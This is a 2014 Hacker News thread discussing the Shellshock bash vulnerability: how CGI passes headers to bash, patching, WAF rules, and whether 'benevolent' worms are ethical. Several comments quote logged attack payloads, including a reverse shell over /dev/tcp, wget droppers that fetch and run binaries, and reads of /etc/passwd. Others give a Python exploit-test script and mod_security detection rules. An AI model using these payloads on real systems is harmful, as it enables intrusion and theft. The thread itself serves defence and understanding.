Everything you need to know about the Shellshock Bash bug (troyhunt.com)
517 points by sjcsjc on Sept 25, 2014 | 287 comments

This is being actively exploited. We (CloudFlare) put in place WAF rules to block the exploit yesterday and I've been looking at the log files for the blocking to see what's going on. Have been seeing things like:

    () { :;}; /bin/ping -c 1 198.x.x.x
    () { :;}; echo shellshock-scan > /dev/udp/example.com/1234
    () { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1
    () { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3
    () { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011
    () { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt
    () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
    () { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &"
If you are one of our (paying) customers the rules to block this exploit are enabled automatically.

That's very similar to what we are seeing as well:


Also, if anyone needs a WAF for protection in the meantime, we offer one that works very well with CloudFlare (their free plan).

Our team is giving it free for 30 days to help out.

Details: https://sucuri.net/website-firewall/

*Just email info@sucuri.net and they will get you hooked up.


Thank you for that blog post. I managed to retrieve some of them and add a few attack vectors to my checklist: https://jve.linuxwall.info/blog/index.php?post/2014/09/25/Sh...

If you find any more of them, do you think you could publish their checksums?

Out of curiosity: did it cause any problems with intended uses of this shell feature? Did anyone complain that it broke something that worked before?

We have not seen any complaints about this.

I assume Cloudflare are filtering HTTP headers. I cannot imagine a valid reason to pass in functions to bash in headers.

And functions with malicious shell script appended at that! ;)

There is no intended use, it's a pure evil bug in bash. I wouldn't be surprised if it was discovered that it has been implanted intentionally.

How can a bug be evil? Don't attach morals to things which should be amoral.

It's a joke: eval(uate) is evil...

This is guerrilla marketing at its finest, and I mean that in a good way.

I'm seeing a mix: some don't do much of anything, but a bunch of new ones using telnet are now starting to pop up.

    () { :;}; /bin/bash -c \x22telnet 9999\x22
    () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq
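For anyone puzzled by the \x22 and \x5C sequences: they're hex escapes applied by the log pipeline to the `"` and `\` characters. A quick way to decode a logged payload (a sketch, assuming Python 3):

```python
# The raw string keeps the backslash-escapes exactly as they appear in
# the log; unicode_escape turns \x22 back into '"', \x5C into '\', etc.
raw = r'() { :;}; /bin/bash -c \x22telnet 9999\x22'
decoded = raw.encode().decode("unicode_escape")
print(decoded)  # () { :;}; /bin/bash -c "telnet 9999"
```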

The payloads that don't do much of anything are possibly security researchers or white hats trying to get an idea of the scope of the issue and/or get ahead of this. Ex. http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...

Yeah, that's certainly the case with a couple of them, and then there are ones like this that are trying to set up shells, revealing where they've been established:

Request of file: /cgi-sys/defaultwebpage.cgi With wget downloading a perl script to launch a shell: () { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\x22

That site is still up and serving right now if anyone wants to take a look.

Same attack hit my server... They're looking for Cpanel sites (defaultwebpage.cgi). Here's a paste of the source in case it goes away:


CloudFlare is so amazing... Thanks for all your hard work. I have over a million blocked malicious attempts on my site which gets a huge amount of traffic (not shellshock, I mean in general).

and if I am not a paying customer, can I enable them manually?

No, the WAF is not included in the free plan.

Out of curiosity, have you considered enabling it temporarily for everyone with Shellshock rules enabled? Just a day or two, to give people time to fix this. Is it feasible with your infrastructure/the way WAF works (I never used one)?

It could do a lot of good for people and be a great PR move at the same time.

I'm going to bring it up internally, but don't hold your breath.

Consider that the bug can be used as an amplification attack and you have a lot of webservers behind the free plan. I'm guessing you don't want to have Cloudflare's infrastructure be the IPs that everyone is blocking because some yoyo is using this to turn those machines into DDOS slaves. Might help your case internally.


EDIT after OP's edit.

Sad. This situation feels kind of like a disaster-relief thing; not a good time to think about monetizing it. Still, I do understand you don't want people thinking you'll always be protecting them from everything even if they don't pay.

EDIT2 after clarification downthread, previous edit is to be disregarded.

It's less about trying to monetize it than about the cost to us of suddenly inspecting every request that goes through us. We service a huge volume of traffic and part of our core value is performance, so keeping our processing latency as low as possible is important.

(Note: I removed sentence about CloudFlare pricing from previous comment to avoid any confusion about monetization)

Fair enough; that's what I meant when asking if it is feasible for you to do so.

Thank you for clarification!

Would it be possible to enable it temporarily to see whether the change significantly impacts your processing latency?

Or do so on a small percentage of free traffic and see how much CPU headroom you still have left.

The monetization wasn't put in place just now; the possibility to add these rules has always been there.

If this is a disaster-relief thing-y, CloudFlare should then be eligible to receive government money later. I doubt that would even be considered by any parties.

Follow up: we enabled basic Shellshock protection for everyone.


As a paying customer, I'd like to say thanks. Too many companies give too much away for free, leaving no incentive to upgrade.

Still, publishing suggested rulesets or at least sending them over to OWASP would be Good Guy.

The RedHat advisory had mod_security rules in it. Our rules are our version of that.


    SecRule REQUEST_HEADERS "^\(\) {" "phase:1,deny,id:1000000,t:urlDecode,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule REQUEST_LINE "\(\) {" "phase:1,deny,id:1000001,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule ARGS_NAMES "^\(\) {" "phase:2,deny,id:1000002,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule ARGS "^\(\) {" "phase:2,deny,id:1000003,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
    SecRule FILES_NAMES "^\(\) {" "phase:2,deny,id:1000004,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"
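All of those rules key on the same thing: the literal "() {" marker that opens a bash exported-function definition. A rough Python equivalent of the match (a sketch, not the actual WAF implementation):

```python
import re

# Most of the rules anchor at the start of the value; the marker itself
# is the four characters '() {' that bash's function-export format uses.
pattern = re.compile(r"^\(\) \{")

assert pattern.search("() { :;}; /bin/ping -c 1 198.51.100.1")
assert not pattern.search("Mozilla/5.0 (X11; Linux x86_64)")
```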

Thanks for sharing this! I've already encountered some skepticism as to the severity of the bug so information like this is very helpful.

Only a few of those look like exploits. A lot of them look like customers testing whether they're vulnerable.

Are you guys at all capable of seeing how far back exploitation of this goes?

No. I only have data for things the WAF blocked.

Paying customers get protection automatically while free customers do not?

I think this is not something which should be treated as a "value-added service" for your paying customers. The health and security of the Internet is far too important.

All your customers should be protected automatically.

P.S. I'm a big fan of Cloudflare.

Read a bit about this because I didn't understand CGI. tl;dr version of what's going on here, if I'm not mistaken (assuming apache/php for this example):

1. Web server (apache) gets request to route to CGI script (PHP)

2. Per the CGI spec, apache passes the request body to PHP as stdin & sets the HTTP headers as environment variables, so PHP can access them

3. In the PHP script, `exec`/`passthru`/`shell_exec` etc. is called to do something in the shell/on the system level. This spawns a new shell (which may be bash)

4. bash interprets the environment variables set by apache

The rub lies in step 4: when bash interprets an environment variable called `HTTP_USER_AGENT` containing the value `() { :;}; /bin/ping -c 1 198.x.x.x` it "gets confused" & interprets that first part (before the second semicolon) as a function, then executes the second part as well

Hopefully this answers the "how does the exploit get from the browser to bash?"
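The four steps above can be sketched end to end. This is only a simulation (it assumes a Unix machine with bash on the PATH) and uses the widely circulated harmless test string rather than a real attack payload:

```python
import os
import subprocess

# Step 2: simulate the CGI server copying a request header into the
# environment that the child process will inherit.
env = dict(os.environ)
env["HTTP_USER_AGENT"] = "() { :;}; echo vulnerable"

# Steps 3-4: spawn bash the way exec()/shell_exec() would. A patched
# bash prints only "this is a test"; an unpatched one prints
# "vulnerable" first, because it executed the trailing command while
# importing the "function" from the environment.
out = subprocess.check_output(["bash", "-c", "echo this is a test"],
                              env=env).decode()
print(out)
```

Note that the command bash runs never references HTTP_USER_AGENT; the damage happens at bash startup.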

Further question: "If I do not use exec/shell_exec/popen etc, am I still vulnerable (just by virtue of using mod_php)?" AFAICT No, but I am not really sure (I hope someone clears this up).

Additional note about PHP: disabling all these passthru type functions has been recommended for years: http://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpi...

Can someone who understands CGI enlighten me why (oh why) everyone treats #4 as the main problem instead of #2 ?

I mean, looking at it from an outside perspective, I can interpret #4 as working as intended (attacker calls my shell with arbitrary parameters and, naturally, my shell does arbitrary things controlled by the attacker), and #2 as a total WTF - why is apache passing arbitrary input data to global-scoped (as in, affecting the subsequent bash invocations) environment variables; and can it stop doing it? If not, why is apache passing this data without any verification/sanitization/escaping, and can it stop doing it?

The fixes to the bash flaw seem like a band-aid - if some web service invokes other programs that somehow get called with attacker-defined environment variables, then it seems like a potential for future exploits on other targets than bash; many other things will change their behavior depending on the environment vars.

It's not setting arbitrary environment variables, it's setting specific ones. Bash is basically calling eval on the list of envvars without re-escaping the values.

The people who wrote the CGI spec didn't expect that to happen at startup.

csh and zsh don't do it, and I can't think of any reason why someone would want that.

CGI was always a kludge, and envvars weren't a great choice, but they were presumed to be safe for arbitrary data.

The flaw lies in the combination of 2/3.

The HTTP_ environment variables are user input.

The PHP (or whatever CGI script) should be sanitizing user input before using it.

If this was PHP scripts doing something like this: system("/bin/sh ".$_GET['x']);

Nobody would be freaking out... because that's just stupid.

In your opinion, what is the difference between php blindly passing unsanitized user input onwards to bash, and apache blindly passing unsanitized user input onwards to php?

Furthermore, in the sample attacks the php scripts don't 'use' that user input in any way; bash gets them because, well, it shares the same environment and its variables. If you'd want a php script 'sanitizing' those variables then it would mean checking for any possible HTTP_ environment variables and explicitly altering them even if the script doesn't recognize them - which seems ridiculous as well.

PHP is specifically designed to deal with unsanitized user input.

bash is not, seems pretty obvious

You're missing the point. Look at this code.

  export evil='() { :;}; exit';
  echo $evil
  # prints '() { :;}; exit'
  # any new bash session immediately exits

Imagine a dev using eval() in PHP. The PHP interpreter creates a new environment, executes your (presumably sanitized) code, but also automatically calls eval on every global variable in your app.

That would be a huge bug in PHP, and it's the equivalent of what bash is doing.

Thanks. I'm still confused though:

1: Why does Bash "interpret" the environment variables' values? What is the expected result of setting a function definition as the value of an environment variable? In my worldview (which is clearly wrong) there is no reason for Bash to look at environment variables' values until they're evaluated.

2: This is probably beside the point: but since when is the empty string a valid function name? I can't get Bash to accept "() { :; }" (as opposed to "f() { :; }") as valid bash.

Edit: see my self-reply for answers.

Aha, I found answers here: http://seclists.org/oss-sec/2014/q3/650

Basically, Bash interprets environment variables at start up as a means for you to pass functions into subshells. Whenever an environment variable's value starts with "() {", it is interpreted as a function, which is named according to the environment variable's name.

I guess even without the bug under discussion this feature is a theoretical security flaw. If you set your user agent to "() { ping your.domain.com; }", a function named HTTP_USER_AGENT, which pinged your.domain.com, would exist in any shell Apache spawned (the function's name is taken from the environment variable's name). It's not hard to imagine a buggy script accidentally executing it.

As far as I can see, this is largely correct. But do realize:

- environments are inherited by child processes.

- it's not just web servers that might execute scripts (DHCP clients could also be vulnerable, SSH with command restrictions, many other things too).

That's the big shitstorm about this bug. It's very hard to determine when you're actually vulnerable. The safest thing to do is to upgrade bash everywhere. But wait! The patches they rolled out don't actually fix the issue all that well. So there's no easy one-stop guide you can follow to fix this. Everybody actually has to think about every single system that might potentially be vulnerable and come up with a good solution all by themselves.

I don't quite get it yet. Let's suppose someone sends a header like this: 'User-Agent:() { :; }; touch /tmp/shellshocked'

Then in my cgi script I do a harmless system('date') call. The file /tmp/shellshocked won't be created right? The file would have been created had I done for example a system('echo $HTTP_USER_AGENT') call. (That is, one needs to explicitly reference the environment variable that gets passed to bash). Is my understanding correct?

No, bash interprets as functions ALL environment variables that begin with '() {' on startup. If you have an unpatched bash it will also execute any trailing commands after the function definition. You don't need to manually reference any environment variables at all to be vulnerable. This is how the bash feature of exporting functions to subshells ("export -f") works.
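The legitimate feature being described can be demonstrated directly. "export -f" serializes a shell function into an environment variable, and a child bash re-parses it back into a function at startup (a sketch, assuming bash is on the PATH):

```python
import subprocess

# Outer bash defines f, exports it as a function, then starts an inner
# bash which receives it via the environment and can call it by name.
out = subprocess.check_output(
    ["bash", "-c",
     "f() { echo from-exported-function; }; export -f f; bash -c f"]
).decode()
print(out)  # from-exported-function
```

Shellshock is this same import step running past the end of the function body.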

This is not my understanding. My understanding is that because this mechanism is intended to pass functions down to the system() call, all environment variables are parsed up front in case they contain any. Because the vulnerability lies in the parsing, it doesn't matter whether you reference the variable in the subsequent shell process or not.

Odd. I am running quite old software:

  echo $0 -> bash
  ls -l /bin/sh -> /bin/bash
  GNU bash, version 3.1.17(2)-release
And I couldn't reproduce the vulnerability in a perl cgi script unless I had explicitly referenced an environment variable in the system() call like I posted above. I thought all versions are vulnerable.

  use strict;
  use warnings;
  use CGI;
  print "Content-Type: text/plain\n\n";

  my $q = CGI->new();

  print "\nHEADERS:\n==============\n";
  my %headers = map { $_ => $q->http($_) } $q->http();
  foreach my $k ( keys %headers ) {
          print "$k\n $headers{$k}\n";
  }

  system("echo hello");

  import socket

  def build_request(meth, host, path, headers=None):
      req = "%s %s HTTP/1.0\r\nHost: %s\r\n" % (meth, path, host)
      if headers is not None:
          req = req + "\r\n".join(headers) + "\r\n"
      return req + "\r\n"

  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  ip_addr = 'xxx.xxx.xxx.xxx'
  sock.connect((ip_addr, 80))
  headers = [
      'User-Agent:() { :; }; /bin/touch /tmp/testshellshock;',
  ]
  req = build_request("GET", ip_addr, "/cgi-bin/test-cgi.pl", headers)
  sock.sendall(req)

From "man perlfunc" under "system":

If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient.

So your example does not invoke the shell.

Passing a shell metacharacter to the system function does indeed then trigger the vulnerability. Thanks, as I didn't realize it wasn't calling the shell otherwise.

A CGI script may not be PHP - it could actually just be a bash script, perl, whatever.

And regardless, the cgi script could invoke bash, or invoke something that invokes bash, etc.

I'm curious -- is FastCGI vulnerable as well?

My understanding was that although regular CGI respawns the command interpreter every time the web server is queried, FastCGI reuses the same command interpreter and just updates the environment.

I have no sympathy really for people who use `system()`-style calls, or bash in their web servers. Bash is fairly obviously designed with complete disregard for security. I seriously doubt this is its last major flaw.

But anyway, is it really that common? I would have thought most CGI scripts are Python, Perl, PHP, etc. and don't use `system()` type calls. Right?

No, super wrong. Underneath the hood there are all kinds of things that go on and result in system() or similar calls. Think about every module in CPAN / PyPI / whatever. Any non-trivial Web app has a high likelihood of eventually, somehow, somewhere, causing a system() type call to fire off.

This is actually quite common and acceptable if you want to interact with a piece of software for which there is no library or api. One real world example is producing thumbnails from Word documents using Libre Office.

You don't have to do it explicitly either. In Perl, for instance, doing stuff like open($tgz, "|-", "gzip | tar -cvf /tmp/file.tgz"); is going to cause execution of /bin/sh behind the scenes. Assuming that /bin/sh is never called during processing of external requests is risky.

Since the post is relatively non-technical, I'd like to underscore that there are substantial concerns with the original and the followup patch, because with or without it, the underlying bash code parser is still exposed to the Internet. Nobody has posted an RCE vector that would be universally bad for the patched version, but several people have already identified "hmm, that's unexpected" types of global side effects when attacker-controlled strings are parsed as functions by bash. More is likely to come.

As of today, based on our conversations on oss-security, there is a third, unofficial patch that takes a much saner approach of isolating exported functions in a distinct namespace:


Especially in high-value or high-risk scenarios, you may want to give it a try. And if you're interested in the reasons why the original patch is problematic, check out:


The idea of using bash to do anything with input coming from the internet is asking for trouble, really... It's just a flaw with how CGI works generally, and how PHP etc. encourage you to build webapps.

It's the same principle as SQL-injection attacks (and the flaw is there for the same reason: it's the obvious quick solution to just query mysql with "select * from users where username = " . PARAMS['username']...).

But this is far more dangerous -- injecting malicious SQL can reveal data, or break things. Injecting malicious bash commands can reconfigure your server to do whatever they like.
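The SQL-injection analogy in miniature, with sqlite3 standing in for MySQL: concatenation lets the input rewrite the query, while parameter binding keeps it as pure data (a sketch; table and values are made up):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT)")
db.execute("INSERT INTO users VALUES ('alice')")

evil = "' OR '1'='1"

# Unsafe: the input becomes part of the SQL text and changes its meaning.
unsafe = db.execute(
    "SELECT * FROM users WHERE username = '" + evil + "'").fetchall()

# Safe: the driver binds the input as a value; it can't alter the query.
safe = db.execute(
    "SELECT * FROM users WHERE username = ?", (evil,)).fetchall()

print(unsafe)  # [('alice',)] -- injection bypassed the filter
print(safe)    # []           -- treated purely as data
```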

I've worked with sysadmins that insisted that CGI be disabled for exactly this reason. If we wanted a dynamic website we needed to use mod_perl or mod_php (it was back in the early 2000s, Rails/Django/nginx hadn't yet been invented). It wasn't a perfect solution - both of them still had plenty of security vulnerabilities - but it cut down the attack surface significantly.

Now I understand what all the security people who said "never use system(). Never, ever" meant.

The dangerous thing is that lots of things that look like a library call to the unwary developer actually call out to other processes (visible if you run strace). This vulnerability will not be limited to web servers, either, and there will likely be systems that escape or unescape parameters in ways that evade app firewall rules.

So trying to understand the issue here, is this actually a bash thing or a problem with the web server forwarding commands to bash? I don't understand why bash would be listening to network traffic on its own.

Not just web servers, but anything that calls system() or popen() is really calling the system shell, /bin/sh. On many systems, /bin/sh is really bash in sh compatibility mode. That means all those perl scripts, CGI scripts, even DHCP clients expose the vulnerability. Ubuntu runs dash as /bin/sh instead, and most BSDs run ash, so they're not as vulnerable.

Edit: also, if you have ssh access to a non-login account, like for git access, this could execute commands on the remote host as if you had a shell.
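The /bin/sh distinction above is easy to check locally, since system() and popen() always run "/bin/sh -c ..." (a sketch, assuming a Unix system):

```python
import os

# Resolve the symlink chain: on Red Hat-style systems this typically
# ends at bash; Debian/Ubuntu point it at dash instead.
shell = os.path.realpath("/bin/sh")
print(shell)
```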

Would a python web server (gunicorn, wsgi) behind nginx be vulnerable to this kind of problem?

I'm just pondering all the python library code out there which relies on calls to subprocess.Popen() to get things done. It seems like dynamic scripting languages with a tendency to shell out to the system could be at risk of this or similar attacks.

It has to be subprocess.Popen(..., shell=True) to be a problem here, the default is shell=False.

(avoiding implicit shell=True was one of the motivations for the subprocess module)
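The distinction the parent comments draw can be shown directly: a list argv is exec'd without any shell starting (so no bash startup, no env-var parsing), while shell=True routes the string through "/bin/sh -c":

```python
import subprocess

# Direct execvp: "echo" runs without any intermediate shell.
direct = subprocess.check_output(["echo", "no shell involved"]).decode()

# shell=True: the string is handed to /bin/sh -c, spawning a shell.
via_shell = subprocess.check_output("echo shell involved",
                                    shell=True).decode()

print(direct.strip())     # no shell involved
print(via_shell.strip())  # shell involved
```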

No, because WSGI (the "I" is for "interface") does not use a shell to pass data. subprocess.Popen would only be a problem if it passes user-generated data as environment variables, and it doesn't do that by default. That's rarely needed, but you may want to review your code to be sure.

Actually I just tried on an app that runs on Gunicorn and does a Popen with shell=True, and it is vulnerable. A simple curl -A '() { :;}; touch /tmp/owned' did create the file on the server.

That was my first question as well. The behavior sounds like exactly the kind of magical weirdness you get with shells. Your question is asked and answered here: https://stackoverflow.com/questions/26022248/is-the-behavior... The answer given there is that the behavior is NOT a documented feature; it's a side-effect of how bash implements inherited functions.

I was also very confused about why a web server would need to store HTTP headers in environment variables. Why would a mature piece of software like Apache do something so hackish? The explanation turns out to be very simple: it's how CGI works. Headers are passed to the CGI script as environment variables. If you don't do it that way, you don't support CGI.

There's one thing that still confuses me, though: why would a CGI implementation use the shell to set environment variables? Why would you use a complex, idiosyncratic piece of software that comes in many different flavors instead of just using the C setenv function?

Apache isn't setting CGI variables using the shell. It may call a shell (indirectly or directly) when executing the CGI script.

So does that mean that running a bash script under cgi doesn't inherently expose you to the vulnerability, you're vulnerable only if the bash script called invokes a shell in a sub-process?

If you're running a bash script as a cgi script in your web server, you're already vulnerable in half a dozen ways. Nobody does that.

If you're running a php/perl/python/ruby script as a cgi script in your web server, and that script calls system() or some variant thereof (backticks in perl, os.system in python), then you're vulnerable to this.

Not many people do that, but those who do won't be running things you think of as web applications. They're going to be web control panels you installed and forgot about, or cheap home routers whose firmware nobody knows who made.

No, running a bash script through CGI is definitely dangerous. What's safe is if your CGI handler is a non-bash program like PHP that reads the environment variables itself and doesn't itself pass those environment variables on to bash.

> why would a CGI implementation use the shell to set environment variables?

This is exactly my question; that, and: if this is so, then isn't any script that uses mod_cgi (e.g., PHP, Perl, etc.) vulnerable? Yet there are multiple statements that only cgi scripts written in bash are vulnerable.

I haven't been able to resolve this apparent inconsistency in the description of how the bug works in the case of CGI, which may be a critical factor in understanding ones own vulnerability. What exactly is the order of execution here in the case of mod_cgi?

Those statements aren't correct. A ShellShock exploit has two steps:

1. Attacker somehow gets to set an environment variable. Since CGI converts HTTP headers to env vars (Host: -> HTTP_HOST, etc), a CGI-enabled server is an easy way to make this happen.

Step 1 on its own would be alarming but ultimately harmless--the variables may contain malicious values, but they can't be used to hurt you if you treat them as untrusted or don't even read them. But since this is *nix, those possibly malicious vars will be inherited by children spawned by the affected process.

If one of those children is Bash, then (regardless of the shell command):

2. When starting up, the Bash process will parse the currently defined environment for things that look like functions and import them. The "ShellShock" portion of this bug is that the parser will keep parsing past the function's closing brace, which means it runs whatever trailing code might be there. If that trailing code was set by an attacker, with the expectation that you'd start a vulnerable Bash, you're owned.

So every time Bash is launched, for any reason, it spins through all of the environment variables and executes anything it finds as long as it's preceded by a fairly simple pattern?

To me, what seems disturbing isn't the extent of the vulnerability, but how long it took for someone to notice it. How many other "shallow" bugs like this one have been missed by the proverbial many eyes?

In principle it shouldn't execute anything, it's only supposed to parse functions. The problem is that it's such an obscure feature I bet almost no-one knew it existed, the many eyes didn't exist in this case.

Statement #2 is the simple expression of the issue that's necessary for understanding it, notably missing or obfuscated in all the other massive verbiage on the topic today.

Thank you, gentle responder.

Seriously, for an "Everything you need to know about X" post, they're very light on the details of what exactly makes a web server vulnerable.

If you run CGI you may be/probably are.

Honestly, I'm having trouble seeing how this is the end of the world vulnerability that it's being hyped as.

There are a TON of servers out there running PHP through good ole CGI. I would imagine that some of those are running web apps that lots and lots of people use. Meaning you now have shell access to those machines.

Mining username/passwords is probably going to be pretty simple. I wonder how many of these machines have credit card numbers stored in the clear? I'd bet that there's a bank somewhere running in exactly that configuration.

It's a big deal.

This is "end of the world" mostly because of all the "things" (a la "Internet of things") like toasters, microwaves, refrigerators, etc. all have vulnerable bash versions.

It's a bash thing, or more specifically, the issue is with the fact that many (mostly old) web applications/web servers pass content from the user straight to bash as environment variables, not expecting this to cause any problems.

To clarify further: it's a bash thing, because the arbitrary code execution happens when bash parses environment variables.

The latter. Some daemons, like CGI scripts will spawn a shell populated with environment variables from the client. With a vulnerable bash, commands in these get executed.

A little more accurately and pedantically:

All HTTP servers invoking scripts over the Common Gateway Interface (CGI) put user-supplied input into environment variables as part of their invocation process, because that's what the CGI spec says to do. Many other daemons perform similar techniques to communicate with subprocesses that they spawn to do work. And when launching a new process, environment variables are (by default) copied from the parent process.

The CGI script itself is neither a daemon nor responsible for populating the environment (merely for invoking system()). Also, most HTTP servers try to go out of their way to avoid invoking shells and instead invoke CGI scripts directly, saving on overhead.

More broadly, if ANY process puts ANY client-supplied input into environment variables and subsequently that process or a subprocess happens to spawn a copy of bash by calling system(3), then you're in trouble.
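Per the CGI spec (RFC 3875), the header-to-variable mapping mentioned above is mechanical: "Header-Name:" arrives in the script's environment as HTTP_HEADER_NAME. A minimal sketch of the transformation (the helper name is made up for illustration):

```python
def cgi_env_name(header):
    # "User-Agent" -> "HTTP_USER_AGENT", per the CGI convention of
    # uppercasing and replacing hyphens with underscores.
    return "HTTP_" + header.strip().upper().replace("-", "_")

print(cgi_env_name("User-Agent"))  # HTTP_USER_AGENT
print(cgi_env_name("Host"))        # HTTP_HOST
```

This is why any header an attacker controls becomes an environment variable an attacker controls.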

Skimming this post, it appears to only reference CVE-2014-6271 and not CVE-2014-7169, so probably not 'everything you need to know'.

(Searching for '=>' doesn't show anything, which I would expect it to if -7169 was mentioned.)

Unless I've missed something, could some benevolent person use the bug to cause remote systems to run something like "sudo apt-get update && sudo apt-get install bash", to patch the vulnerability automatically? (it makes lots of assumptions, but surely it's better to have some patched systems as a result.)

Certain worms include a patching step like this when they infect a machine to avoid losing control via re-infection.

For a high school science research course I did an epidemiological modeling study on how "good" reverse-worms might affect the spread of infection, they're a pretty interesting thought experiment. With something involving exponential growth like this, early movers have a significant advantage.

As far as I know, there hasn't been a successful reverse-worm that did not accidentally cause worse issues (flooding local networks with a high density set of boxes doing over-zealous scanning, or accidentally destroying boxes due to a slapdash narrowly tested script).

Reverse-worms can either wait around, detecting requests from infected-but-not-patched systems to re-infect and patch them, or just start scanning IP ranges themselves. The former feels somewhat less pernicious. "Try to infect this computer, you will be patched and help patch." But that relies on other worms not patching their zombies.

It may be possible to exploit the bug for "good" reasons like patching the bug, but the patches that are out now don't seem to properly plug the exploit, and as with any update there are plenty of considerations that could end up bricking the application.

Aside from the "it's not yours to fix" angle, you have to weigh the moral benefits of possibly patching the exploit, possibly crashing the application (I bet this is much more likely than a successful fix at this point), and wait-and-seeing whether the application owner patches the exploit on their own (along with the risk of a compromise in the mean time).

Edit: Of course there are a slew of legal issues with attempting this as well.

"could some benevolent person use the bug to cause remote systems to run something like "

That's not benevolent, that's intrusion. Nobody has the right to take it upon themselves to determine what someone else should be doing in this case. I would imagine that an action like that would also clearly violate a law or two (I'm sure others more knowledgeable could cite the law).

At the risk of participating in a philosophical debate, I pose a classic counterexample:

You encounter a car parked on the side of the road in the middle of nowhere. Its windows are rolled down. Storm clouds are rumbling nearby and it's obviously about to rain. There's nobody around but you.

Do you also consider rolling up the windows to be intrusion?

Personally I'd feel an ethical obligation to help the stranger out by preventing damage to his/her property. However I can completely understand people leaving well-enough alone.

Law aside, I'm much more on the fence about people automatically scanning for and "fixing" vulnerabilities, however. On one hand, how do you know you're really helping? On the other, as someone who's maintained a server or two, I'd rather be solving problems caused by a well-intentioned whitehat than miss problems caused by ill-intentioned blackhats.

"Do you also consider rolling up the windows to be intrusion?"

Yes definitely. Really no different than if you would want someone to enter your house to close your windows.

Now you might say "well what if it can be done from the outside" without entering?

That is a bit different.

Except for one thing. What if someone saw you doing that? What if the owner saw you doing that and didn't know why you were messing with their car? (I had this happen with a boat one time, btw.) There is an immediate sense of shock because you don't know what is going on. And in that case who knows what will happen? Maybe they might start a fight or shoot you. That's not good for anyone. Maybe they have something valuable in the car that they think you are going after. Maybe they have serious mental problems.

Here's the point. It's one thing if you see a baby in a hot car and decide to take action. The benefit outweighs the risks. But it's another thing if you decide to roll up the windows to prevent someone's car from getting wet inside (covered by homeowners insurance with a low deductible in many cases, not that it matters, though). Different story. Make sense?

Depends on if it has power windows ;)

Better to use:

    echo You are vulnerable to shellshock | wall

sudo requires a password to be entered by default, right? I would guess that for most setups this wouldn't be possible without some kind of privilege escalation as well (or if the webserver was running with root privileges).

You'd be surprised by the number of servers that don't ask for password when you try to use sudo. They just assume that the actual owner issued the command and go straight to issuing the command as root.

(Caveat: typically it has to be a certain user)

I'm ashamed to admit I used to think that was convenient. It makes systems infinitely more vulnerable in the event of an RCE bug.

Many systems still use passwordless sudo to permit certain users to run specific commands -- but now, if those commands are shell scripts run via bash, the users can execute arbitrary commands (this isn't an uncommon class of privilege escalation problem, though).

And how would the "benign attacker" know the superuser password that sudo will ask for? It's not like this is a logged-in ssh session.

sudo can be set up lots of different ways -- including such that there's no password needed.

> its not like this is a logged in ssh session

That's not correct -- whatever user is executing your CGI scripts is the "logged-in" user in bash, right?

Obviously that user should be quite locked down, and should not be allowed to run sudo at all, let alone without a password... but there are so many amateur server admins out there that I imagine there are quite a few servers where this is a serious problem (with or without sudo access enabled for the executing user).

Extremely good point, thank you. :)

If you're running Apache on Linux/UNIX, and don't absolutely need CGI, it's straightforward to turn it off in Apache.

Put a "#" in front of

LoadModule cgi_module modules/mod_cgi.so

in /etc/httpd/conf/httpd.conf. This prevents the code that runs CGI scripts from even being loaded with Apache, and will totally disable all CGI scripts. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.

This will break CPanel, but not non-CGI admin tools such as Webmin. I can't say anything about PHP; we don't use it.
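The edit described above can be scripted; here is a sketch demonstrated on a scratch copy rather than the live config (the real path, e.g. /etc/httpd/conf/httpd.conf, varies by distro):

```shell
#!/bin/sh
# Build a tiny demo config so the sed command is safe to show end-to-end:
cat > /tmp/httpd.conf.demo <<'EOF'
LoadModule cgi_module modules/mod_cgi.so
LoadModule rewrite_module modules/mod_rewrite.so
EOF
# Prefix the mod_cgi line with "#", leaving other modules untouched:
sed -i 's|^LoadModule cgi_module|#&|' /tmp/httpd.conf.demo
cat /tmp/httpd.conf.demo
# On the real config, follow up with:
#   apachectl configtest && apachectl graceful
```

After the edit, only the mod_cgi line carries the leading "#"; a config test plus a graceful reload picks up the change without dropping connections.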

People are out there probing. This is from an Apache server log today from a dedicated server I run:

    - - [24/Sep/2014:23:08:56 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 338 "-" "() { :;}; /bin/ping -c 1"

The source is on "i3d.net", which is a hosting service in Rotterdam NL. So someone is running probes from something bigger than a desktop. I sent their support people a note.

For Windows devs: remember that some tools and libraries come with bash (and some may not even tell you explicitly).

For instance, msysgit has the vulnerability[1]:

  $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  vulnerable
  this is a test

[1] from the comments on the blog in the OP

Can confirm the same for Github for Windows (msysgit again), Chef for Windows (embedded bash) as well as Cygwin's bash

Okay, after more tests on the latest version of win-bash I can confirm that it is vulnerable.

For Mac OS X, until Apple releases a software update, I've applied the original CVE-2014-6271 (shellshock) patch and am going to apply the CVE-2014-7169 patch as well once it passes review. Repository and instructions to reproduce without trusting me are located here:


